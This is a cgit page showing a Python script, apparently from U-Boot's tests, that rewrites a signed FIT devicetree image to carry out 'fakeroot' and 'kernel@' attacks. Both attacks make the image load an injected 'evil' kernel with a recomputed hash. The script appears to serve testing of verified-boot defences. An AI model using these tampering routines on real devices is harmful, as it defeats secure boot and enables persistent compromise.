~funderscore blog cgit wiki get in touch
aboutsummaryrefslogtreecommitdiff
blob: e2b0cd65468b94aa1cabcd25a202900c9fc7f8ea (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020, Intel Corporation

"""Modifies a devicetree to add a fake root node, for testing purposes"""

import hashlib
import struct
import sys

FDT_PROP = 0x3
FDT_BEGIN_NODE = 0x1
FDT_END_NODE = 0x2
FDT_END = 0x9

FAKE_ROOT_ATTACK = 0
KERNEL_AT = 1

MAGIC = 0xd00dfeed

EVIL_KERNEL_NAME = b'evil_kernel'
FAKE_ROOT_NAME = b'f@keroot'


def getstr(dt_strings, off):
    """Get a string from the devicetree string table

    Args:
        dt_strings (bytes): Devicetree strings section
        off (int): Offset of string to read

    Returns:
        str: String read from the table
    """
    output = ''
    while dt_strings[off]:
        output += chr(dt_strings[off])
        off += 1

    return output


def align(offset):
    """Align an offset to a multiple of 4

    Args:
        offset (int): Offset to align

    Returns:
        int: Resulting aligned offset (rounds up to nearest multiple)
    """
    return (offset + 3) & ~3


def determine_offset(dt_struct, dt_strings, searched_node_name):
    """Determines the offset of an element, either a node or a property

    Args:
        dt_struct (bytes): Devicetree struct section
        dt_strings (bytes): Devicetree strings section
        searched_node_name (str): element path, ex: /images/kernel@1/data

    Returns:
        tuple: (node start offset, node end offset)
        if element is not found, returns (None, None)
    """
    offset = 0
    depth = -1

    path = '/'

    object_start_offset = None
    object_end_offset = None
    object_depth = None

    while offset < len(dt_struct):
        (tag,) = struct.unpack('>I', dt_struct[offset:offset + 4])

        if tag == FDT_BEGIN_NODE:
            depth += 1

            begin_node_offset = offset
            offset += 4

            node_name = getstr(dt_struct, offset)
            offset += len(node_name) + 1
            offset = align(offset)

            if path[-1] != '/':
                path += '/'

            path += str(node_name)

            if path == searched_node_name:
                object_start_offset = begin_node_offset
                object_depth = depth

        elif tag == FDT_PROP:
            begin_prop_offset = offset

            offset += 4
            len_tag, nameoff = struct.unpack('>II',
                                             dt_struct[offset:offset + 8])
            offset += 8
            prop_name = getstr(dt_strings, nameoff)

            len_tag = align(len_tag)

            offset += len_tag

            node_path = path + '/' + str(prop_name)

            if node_path == searched_node_name:
                object_start_offset = begin_prop_offset

        elif tag == FDT_END_NODE:
            offset += 4

            path = path[:path.rfind('/')]
            if not path:
                path = '/'

            if depth == object_depth:
                object_end_offset = offset
                break
            depth -= 1
        elif tag == FDT_END:
            break

        else:
            print('unknown tag=0x%x, offset=0x%x found!' % (tag, offset))
            break

    return object_start_offset, object_end_offset


def modify_node_name(dt_struct, node_offset, replcd_name):
    """Change the name of a node

    Args:
        dt_struct (bytes): Devicetree struct section
        node_offset (int): Offset of node
        replcd_name (str): New name for node

    Returns:
        bytes: New dt_struct contents
    """

    # skip 4 bytes for the FDT_BEGIN_NODE
    node_offset += 4

    node_name = getstr(dt_struct, node_offset)
    node_name_len = len(node_name) + 1

    node_name_len = align(node_name_len)

    replcd_name += b'\0'

    # align on 4 bytes
    while len(replcd_name) % 4:
        replcd_name += b'\0'

    dt_struct = (dt_struct[:node_offset] + replcd_name +
                 dt_struct[node_offset + node_name_len:])

    return dt_struct


def modify_prop_content(dt_struct, prop_offset, content):
    """Overwrite the value of a property

    Args:
        dt_struct (bytes): Devicetree struct section
        prop_offset (int): Offset of property (FDT_PROP tag)
        content (bytes): New content for the property

    Returns:
        bytes: New dt_struct contents
    """
    # skip FDT_PROP
    prop_offset += 4
    (len_tag, nameoff) = struct.unpack('>II',
                                       dt_struct[prop_offset:prop_offset + 8])

    # compute padded original node length
    original_node_len = len_tag + 8  # content length + prop meta data len

    original_node_len = align(original_node_len)

    added_data = struct.pack('>II', len(content), nameoff)
    added_data += content
    while len(added_data) % 4:
        added_data += b'\0'

    dt_struct = (dt_struct[:prop_offset] + added_data +
                 dt_struct[prop_offset + original_node_len:])

    return dt_struct


def change_property_value(dt_struct, dt_strings, prop_path, prop_value,
                          required=True):
    """Change a given property value

    Args:
        dt_struct (bytes): Devicetree struct section
        dt_strings (bytes): Devicetree strings section
        prop_path (str): full path of the target property
        prop_value (bytes):  new property name
        required (bool): raise an exception if property not found

    Returns:
        bytes: New dt_struct contents

    Raises:
        ValueError: if the property is not found
    """
    (rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path)
    if rt_node_start is None:
        if not required:
            return dt_struct
        raise ValueError('Fatal error, unable to find prop %s' % prop_path)

    dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value)

    return dt_struct

def change_node_name(dt_struct, dt_strings, node_path, node_name):
    """Change a given node name

    Args:
        dt_struct (bytes): Devicetree struct section
        dt_strings (bytes): Devicetree strings section
        node_path (str): full path of the target node
        node_name (str): new node name, just node name not full path

    Returns:
        bytes: New dt_struct contents

    Raises:
        ValueError: if the node is not found
    """
    (rt_node_start, rt_node_end) = (
        determine_offset(dt_struct, dt_strings, node_path))
    if rt_node_start is None or rt_node_end is None:
        raise ValueError('Fatal error, unable to find root node')

    dt_struct = modify_node_name(dt_struct, rt_node_start, node_name)

    return dt_struct

def get_prop_value(dt_struct, dt_strings, prop_path):
    """Get the content of a property based on its path

    Args:
        dt_struct (bytes): Devicetree struct section
        dt_strings (bytes): Devicetree strings section
        prop_path (str): full path of the target property

    Returns:
        bytes: Property value

    Raises:
        ValueError: if the property is not found
    """
    (offset, _) = determine_offset(dt_struct, dt_strings, prop_path)
    if offset is None:
        raise ValueError('Fatal error, unable to find prop')

    offset += 4
    (len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4])

    offset += 8
    tag_data = dt_struct[offset:offset + len_tag]

    return tag_data


def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash):
    """Conduct the kernel@ attack

    It fetches from /configurations/default the name of the kernel being loaded.
    Then, if the kernel name does not contain any @sign, duplicates the kernel
    in /images node and appends '@evil' to its name.
    It inserts a new kernel content and updates its images digest.

    Inputs:
        - FIT dt_struct
        - FIT dt_strings
        - kernel content blob
        - kernel hash blob

    Important note: it assumes the U-Boot loading method is 'kernel' and the
    loaded kernel hash's subnode name is 'hash-1'
    """

    # retrieve the default configuration name
    default_conf_name = get_prop_value(
        dt_struct, dt_strings, '/configurations/default')
    default_conf_name = str(default_conf_name[:-1], 'utf-8')

    conf_path = '/configurations/' + default_conf_name

    # fetch the loaded kernel name from the default configuration
    loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel')

    loaded_kernel = str(loaded_kernel[:-1], 'utf-8')

    if loaded_kernel.find('@') != -1:
        print('kernel@ attack does not work on nodes already containing an @ sign!')
        sys.exit()

    # determine boundaries of the loaded kernel
    (krn_node_start, krn_node_end) = (determine_offset(
        dt_struct, dt_strings, '/images/' + loaded_kernel))
    if krn_node_start is None and krn_node_end is None:
        print('Fatal error, unable to find root node')
        sys.exit()

    # copy the loaded kernel
    loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end]

    # insert the copy inside the tree
    dt_struct = dt_struct[:krn_node_start] + \
        loaded_kernel_copy + dt_struct[krn_node_start:]

    evil_kernel_name = loaded_kernel+'@evil'

    # change the inserted kernel name
    dt_struct = change_node_name(
        dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8'))

    # change the content of the kernel being loaded
    dt_struct = change_property_value(
        dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content)

    # change the content of the kernel being loaded
    dt_struct = change_property_value(
        dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash)

    return dt_struct


def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest):
    """Conduct the fakenode attack

    It duplicates the original root node at the beginning of the tree.
    Then it modifies within this duplicated tree:
        - The loaded kernel name
        - The loaded  kernel data

    Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel
    hash's subnode name is hash@1
    """

    # retrieve the default configuration name
    default_conf_name = get_prop_value(
        dt_struct, dt_strings, '/configurations/default')
    default_conf_name = str(default_conf_name[:-1], 'utf-8')

    conf_path = '/configurations/'+default_conf_name

    # fetch the loaded kernel name from the default configuration
    loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel')

    loaded_kernel = str(loaded_kernel[:-1], 'utf-8')

    # determine root node start and end:
    (rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/'))
    if (rt_node_start is None) or (rt_node_end is None):
        print('Fatal error, unable to find root node')
        sys.exit()

    # duplicate the whole tree
    duplicated_node = dt_struct[rt_node_start:rt_node_end]

    # dchange root name (empty name) to fake root name
    new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME)

    dt_struct = new_dup + dt_struct

    # change the value of /<fake_root_name>/configs/<default_config_name>/kernel
    # so our modified kernel will be loaded
    base = '/' + str(FAKE_ROOT_NAME, 'utf-8')
    value_path = base + conf_path+'/kernel'
    dt_struct = change_property_value(dt_struct, dt_strings, value_path,
                                      EVIL_KERNEL_NAME + b'\0')

    # change the node of the /<fake_root_name>/images/<original_kernel_name>
    images_path = base + '/images/'
    node_path = images_path + loaded_kernel
    dt_struct = change_node_name(dt_struct, dt_strings, node_path,
                                 EVIL_KERNEL_NAME)

    # change the content of the kernel being loaded
    data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data'
    dt_struct = change_property_value(dt_struct, dt_strings, data_path,
                                      kernel_content, required=False)

    # update the digest value
    hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value'
    dt_struct = change_property_value(dt_struct, dt_strings, hash_path,
                                      kernel_digest)

    return dt_struct

def add_evil_node(in_fname, out_fname, kernel_fname, attack):
    """Add an evil node to the devicetree

    Args:
        in_fname (str): Filename of input devicetree
        out_fname (str): Filename to write modified devicetree to
        kernel_fname (str): Filename of kernel data to add to evil node
        attack (str): Attack type ('fakeroot' or 'kernel@')

    Raises:
        ValueError: Unknown attack name
    """
    if attack == 'fakeroot':
        attack = FAKE_ROOT_ATTACK
    elif attack == 'kernel@':
        attack = KERNEL_AT
    else:
        raise ValueError('Unknown attack name!')

    with open(in_fname, 'rb') as fin:
        input_data = fin.read()

    hdr = input_data[0:0x28]

    offset = 0
    magic = struct.unpack('>I', hdr[offset:offset + 4])[0]
    if magic != MAGIC:
        raise ValueError('Wrong magic!')

    offset += 4
    (totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version,
     last_comp_version, boot_cpuid_phys, size_dt_strings,
     size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36])

    rsv_map = input_data[off_mem_rsvmap:off_dt_struct]
    dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct]
    dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings]

    with open(kernel_fname, 'rb') as kernel_file:
        kernel_content = kernel_file.read()

    # computing inserted kernel hash
    val = hashlib.sha1()
    val.update(kernel_content)
    hash_digest = val.digest()

    if attack == FAKE_ROOT_ATTACK:
        dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content,
                                          hash_digest)
    elif attack == KERNEL_AT:
        dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content,
                                     hash_digest)

    # now rebuild the new file
    size_dt_strings = len(dt_strings)
    size_dt_struct = len(dt_struct)
    totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings
    off_mem_rsvmap = 0x28
    off_dt_struct = off_mem_rsvmap + len(rsv_map)
    off_dt_strings = off_dt_struct + len(dt_struct)

    header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct,
                         off_dt_strings, off_mem_rsvmap, version,
                         last_comp_version, boot_cpuid_phys, size_dt_strings,
                         size_dt_struct)

    with open(out_fname, 'wb') as output_file:
        output_file.write(header)
        output_file.write(rsv_map)
        output_file.write(dt_struct)
        output_file.write(dt_strings)

if __name__ == '__main__':
    if len(sys.argv) != 5:
        print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' %
              sys.argv[0])
        print('valid attack names: [fakeroot, kernel@]')
        sys.exit(1)

    in_fname, out_fname, kernel_fname, attack = sys.argv[1:]
    add_evil_node(in_fname, out_fname, kernel_fname, attack)